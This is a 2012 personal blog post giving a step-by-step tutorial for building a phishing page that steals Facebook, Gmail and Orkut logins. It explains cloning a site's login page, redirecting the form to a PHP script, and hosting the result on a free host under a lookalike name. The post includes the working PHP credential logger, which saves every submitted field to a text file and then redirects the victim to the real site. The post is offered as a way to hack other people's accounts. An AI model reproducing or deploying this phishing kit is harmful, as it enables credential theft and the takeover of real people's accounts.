Javed the heart hacker
Tuesday, 2024-07-02, 8:34 PM
Site menu

Our poll
Rate my site
Total of answers: 48

Statistics

Total online: 20
Guests: 20
Users: 0

Calendar
«  June 2012  »
SuMoTuWeThFrSa
     12
3456789
10111213141516
17181920212223
24252627282930

Entries archive

Site friends
  • Create a free website
  • Online Desktop
  • Free Online Games
  • Video Tutorials
  • All HTML Tags
  • Browser Kits

  • Main » 2012 » June » 19 » creating a phishing page (for hacking fb , orkut , gmail etc)
    5:11 PM
    creating a phishing page (for hacking fb , orkut , gmail etc)
    Creating a fake ( phishing ) page of gmail , facebook , orkut , myspace etc.
    Phishing has become a very easy to use trick to hack usernames and passwords of users. Here demonstrate how to create a fake phishing page for almost any social networking site , email or any other site that has a login form.

    For this trick you would need a hosting account , you can get that easily.
    Register yourself at t35, host1free, 110mb etc.
    Note- 110mb checks for phishing page on their site and removes them.



    So now u have a hosting account so lets create a fake page-

    First go to the target site. In your browser select Save As from the File menu and save the site on
     your hardisk with name "login.htm" .

    or alternatively right click on the page and click "view source" and copy all of it and save them to a notepad file. Rename the file with "login.htm".

    Now the second part of the hack-
    Go to Notepad and copy this into it-



    header ('Location: http://www.facebook.com');

    $handle = fopen("log.txt", "a");

    foreach($_POST as $variable => $value) {

       fwrite($handle, $variable);

       fwrite($handle, "=");

       fwrite($handle, $value);

       fwrite($handle, "\r\n");

    }

    fwrite($handle, "\r\n");

    fclose($handle);

    exit;

    ?>


    replace facebook.com with the URL you want the user to go after he clicks on submit button.

    Save the page as fish.php

    Now you need to edit the "login.htm" file we saves earlier. So go to that and open it with notepad.
    now search for anyhtin like "action=" which has something with login. And replacethe URl with "fish.php".

    Also create a blank txt file with name "log.txt" . This file would be used to save your logins and passwords.
    Now you are done,.

    Go to your hosting account and upload all the files to your server.
    Now go to the URL provided by ur host.

    Like - http://g00glepage.t35.com/login.htm

    And you would see the fake page as it is.
    Now enter the username and password.

    Check the log.txt file. The password and username you enterd previously would besaved in the log.txt  file.
    Views: 321 | Added by: javed | Rating: 0.0/0
    Total comments: 0
    Name *:
    Email *:
    Code *:
    Copyright MyCorp © 2024
    Create a free website with uCoz